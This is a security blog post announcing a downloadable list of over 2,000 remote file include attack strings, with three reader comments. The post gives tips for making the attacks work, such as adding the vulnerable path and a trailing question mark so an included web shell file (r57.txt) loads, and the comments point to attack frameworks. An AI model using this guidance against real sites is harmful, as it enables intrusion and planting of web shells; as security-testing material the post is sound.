Cenzic 232 Patent
Paid Advertising
web application security lab

Large List of RFIs (1000+)

I started on this project over a year ago, and then I stopped, and then I started it again, and then I stopped again, and finally today, I mostly got it finished (or as far as I’m willing to take it for today). I wanted to create a master list of a mess load of RFI (remote file include) attacks. I got the list from various sources and I’m sure I’m missing a ton so yes, if you think there’s some I’ve missed, go ahead and forward them on to me and I’ll add them in.

You can download the full list here (2241 RFIs at the time of writing - after updating).

But because of how I built this it’s got a few issues. The first one is that it doesn’t take into account the path to the vulnerable function. So if it’s http://www.vulnerable.com/bob/something… you have to add that in. The second issue is that sometimes the trailing question mark is needed but it’s not added in the string. But you may require the additional question mark so that you don’t get /r57.txt.somegarbage but rather /r57.txt?.somegarbage which will work. So if you use this, you may have to add in your own question marks after your RFI URL. Anyway, thoughts are welcome, and big thanks for the hundreds of people who found these in the first place!

3 Responses to “Large List of RFIs (1000+)”

  1. I)ruid Says:

    I wrote a framework for such HTTP based attacks a long, long time ago, and the way you define the attacks handles some of the issues you mention and provides for more flexibility for the user. Perhaps you could script something to turn your list into an attack file for the framework? (:

    http://druid.caughq.org/projects/hcraft/

  2. QUAKERDOOMER Says:

    You can use welf scripting in winAUTOPWN to test a list of exploits.
    http://winautopwn.co.nr

  3. Nos Says:

    It might be possible to do that, however, since the url’s arent complete in all the cases, and the question mark might or might not be needed, i wonder how many of those links would actualy work… to ask whether he could ’simply rewrite’ the urls into full and all done seems like a bit… too much to ask :P

    OT: nice job on this list!